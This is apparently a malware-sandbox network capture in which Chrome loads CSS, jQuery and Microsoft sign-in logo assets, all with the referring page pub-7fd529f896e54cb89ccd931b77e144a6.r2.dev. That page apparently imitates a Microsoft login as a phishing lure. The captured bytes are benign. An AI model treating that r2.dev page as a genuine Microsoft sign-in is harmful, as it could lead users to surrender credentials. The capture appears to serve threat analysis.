2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 61 75 74 6f 7d 2e 69 6d 67 2d 63 69 72 63 6c 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 7d 2e 73 72 2d 6f 6e 6c 79 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 70 78 3b 68 65 69 67 68 74 3a 31 70 78 3b 6d 61 72 67 69 6e 3a 2d 31 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 63 6c 69 70 3a 72 65 63 74 28 30 2c 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 3a 30 7d 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 61 63 74 69 76 65 2c 2e 73 72 2d 6f 6e 6c 79 2d 66 6f 63 75 73 61 62 6c 65 3a 66 6f 63 75 73 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 3b 77 69 64 74 Data Ascii: isplay:block;max-width:100%;height:auto}.img-circle{border-radius:50%}.sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.sr-only-focusable:active,.sr-only-focusable:focus{position:static;widt
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75 6c 20 75 6c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 63 75 72 73 6f 72 3a 68 65 6c 70 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 6f 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 70 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 75 6c 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 2e 73 6d 61 6c 6c 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 62 6c 6f 63 6b 71 75 6f 74 65 20 73 6d 61 6c 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 61 64 64 72 65 73 73 7b 66 6f 6e 74 2d 73 Data Ascii: ol ul,ul ol,ul ul{margin-bottom:0}abbr[data-original-title],abbr[title]{cursor:help}blockquote ol:last-child,blockquote p:last-child,blockquote ul:last-child{margin-bottom:0}blockquote .small,blockquote footer,blockquote small{display:block}address{font-s
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 2e 33 36 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 2e 33 36 70 78 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 31 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 36 32 2e 37 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 33 2e 39 32 30 33 35 72 65 6d 7d 2e 74 65 78 74 2d 68 65 61 64 65 72 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 31 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 Data Ascii: rem;line-height:3.5rem;padding-bottom:3.36px;padding-top:3.36px}.text-header.text-maxlines-1,h1.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:62.73px;max-height:3.92035rem}.text-header.text-maxlines-2,h1.text-maxlines-2{max-height:1
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 67 68 74 3a 33 2e 37 39 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 38 2e 37 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 35 34 35 34 72 65 6d 7d 2e 74 65 78 74 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 68 33 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 31 31 36 2e 37 33 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 37 2e 32 39 35 34 72 65 6d 7d 2e 74 65 78 74 2d 73 75 62 74 69 74 6c 65 2c 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b Data Ascii: ght:3.7954rem}.text-title.text-maxlines-3,h3.text-maxlines-3{max-height:88.73px;max-height:5.5454rem}.text-title.text-maxlines-4,h3.text-maxlines-4{max-height:116.73px;max-height:7.2954rem}.text-subtitle,h4{font-size:20px;line-height:24px;font-weight:400;
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 65 69 67 68 74 3a 2e 37 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 38 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 38 32 70 78 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 68 36 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 33 2e 36 34 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 2e 38 35 32 32 35 72 65 6d 7d 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 2c 68 36 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 32 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 35 2e 36 Data Ascii: eight:.75rem;padding-bottom:.82px;padding-top:.82px}.text-caption-alt.text-maxlines-1,h6.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:13.64px;max-height:.85225rem}.text-caption-alt.text-maxlines-2,h6.text-maxlines-2{max-height:25.6
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 33 2e 37 37 38 33 38 72 65 6d 7d 2e 74 65 78 74 2d 62 6f 64 79 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 2c 70 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 7b 6d 61 78 2d 68 65 69 67 68 74 3a 38 30 2e 34 35 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 2e 30 32 38 33 38 72 65 6d 7d 2e 74 65 78 74 2d 62 61 73 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 39 33 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 33 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 2e 32 33 70 78 7d 2e 74 65 78 74 2d 62 61 73 65 2e 74 65 78 74 2d 6d 61 78 6c 69 Data Ascii: 3.77838rem}.text-body.text-maxlines-4,p.text-maxlines-4{max-height:80.45px;max-height:5.02838rem}.text-base{font-size:15px;line-height:20px;font-weight:600;font-size:.9375rem;line-height:1.25rem;padding-bottom:.23px;padding-top:.23px}.text-base.text-maxli
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 3a 62 6f 74 68 7d 2e 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 20 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 32 70 78 7d 2e 72 6f 77 3a 61 66 74 65 72 2c 2e 72 6f 77 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 20 22 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 72 6f 77 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 7d 2e 63 6f 6c 2d 6c 67 2d 31 2c 2e 63 6f 6c 2d 6c 67 2d 31 30 2c 2e 63 6f 6c 2d 6c 67 2d 31 31 2c 2e 63 6f 6c 2d 6c 67 2d 31 32 2c 2e 63 6f 6c 2d 6c 67 2d 31 33 2c 2e 63 6f 6c 2d 6c 67 2d 31 34 2c 2e 63 6f 6c 2d 6c 67 2d 31 35 2c 2e Data Ascii: :both}.container .container,.container-fluid .container{width:auto}.row{margin-left:-2px;margin-right:-2px}.row:after,.row:before{content:" ";display:table}.row:after{clear:both}.col-lg-1,.col-lg-10,.col-lg-11,.col-lg-12,.col-lg-13,.col-lg-14,.col-lg-15,.
2024-05-23 22:29:15 UTC	1369	IN	Data Raw: 78 73 2d 31 38 2c 2e 63 6f 6c 2d 78 73 2d 31 39 2c 2e 63 6f 6c 2d 78 73 2d 32 2c 2e 63 6f 6c 2d 78 73 2d 32 30 2c 2e 63 6f 6c 2d 78 73 2d 32 31 2c 2e 63 6f 6c 2d 78 73 2d 32 32 2c 2e 63 6f 6c 2d 78 73 2d 32 33 2c 2e 63 6f 6c 2d 78 73 2d 32 34 2c 2e 63 6f 6c 2d 78 73 2d 33 2c 2e 63 6f 6c 2d 78 73 2d 34 2c 2e 63 6f 6c 2d 78 73 2d 35 2c 2e 63 6f 6c 2d 78 73 2d 36 2c 2e 63 6f 6c 2d 78 73 2d 37 2c 2e 63 6f 6c 2d 78 73 2d 38 2c 2e 63 6f 6c 2d 78 73 2d 39 7b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 63 6f 6c 2d 78 73 2d 31 7b 77 69 64 74 68 3a 34 2e 31 36 36 36 37 25 7d 2e 63 6f 6c 2d 78 73 2d 32 7b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 78 73 2d 33 7b 77 69 64 74 68 3a 31 32 2e 35 25 7d 2e 63 6f 6c 2d 78 73 2d 34 7b 77 69 64 74 68 3a 31 36 2e 36 Data Ascii: xs-18,.col-xs-19,.col-xs-2,.col-xs-20,.col-xs-21,.col-xs-22,.col-xs-23,.col-xs-24,.col-xs-3,.col-xs-4,.col-xs-5,.col-xs-6,.col-xs-7,.col-xs-8,.col-xs-9{float:left}.col-xs-1{width:4.16667%}.col-xs-2{width:8.33333%}.col-xs-3{width:12.5%}.col-xs-4{width:16.6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	151.101.194.137	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:16 UTC	561	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:16 UTC	563	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 23 May 2024 22:29:16 GMT Age: 2638019 X-Served-By: cache-lga21947-LGA, cache-ewr18122-EWR X-Cache: HIT, HIT X-Cache-Hits: 1589, 88 X-Timer: S1716503356.167153,VS0,VE0 Vary: Accept-Encoding
2024-05-23 22:29:16 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2024-05-23 22:29:16 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2024-05-23 22:29:16 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2024-05-23 22:29:16 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2024-05-23 22:29:16 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2024-05-23 22:29:16 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	13.107.213.45	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:16 UTC	677	OUT	GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:16 UTC	785	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:29:16 GMT Content-Type: image/svg+xml Content-Length: 276 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:34 GMT ETag: 0x8D79B8371B97A82 x-ms-request-id: 29b5eec8-201e-0074-4a60-adbb96000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240523T222916Z-16f669959b4vrk9ds9n6529aun00000005s000000000e3xv x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-05-23 22:29:16 UTC	276	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37 Data Ascii: Q=o +=tEk["/g;n,{2eJ)8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	152.199.23.37	443	3452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:29:16 UTC	683	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-7fd529f896e54cb89ccd931b77e144a6.r2.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 22:29:16 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 5253413 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Thu, 23 May 2024 22:29:16 GMT Etag: 0x8D79A1B9F5E121A Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT Server: ECAcc (lhd/35E6) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: fb160a5f-a01e-00ad-4a99-7d435b000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-05-23 22:29:16 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 